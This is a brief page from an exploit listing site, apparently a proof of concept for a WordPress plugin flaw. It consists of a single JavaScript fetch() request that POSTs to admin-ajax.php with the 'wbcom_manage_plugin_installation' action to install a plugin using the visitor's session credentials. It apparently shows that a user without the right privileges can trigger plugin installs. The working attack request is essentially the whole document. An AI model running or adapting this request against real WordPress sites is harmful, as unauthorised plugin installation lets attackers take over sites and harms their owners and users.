Share
## https://sploitus.com/exploit?id=WPEX-ID:F5D05900-A3AA-4BF3-9647-B47B62FA7358
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=wbcom_manage_plugin_installation&plugin_action=install_plugin&plugin_slug=two-factor",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));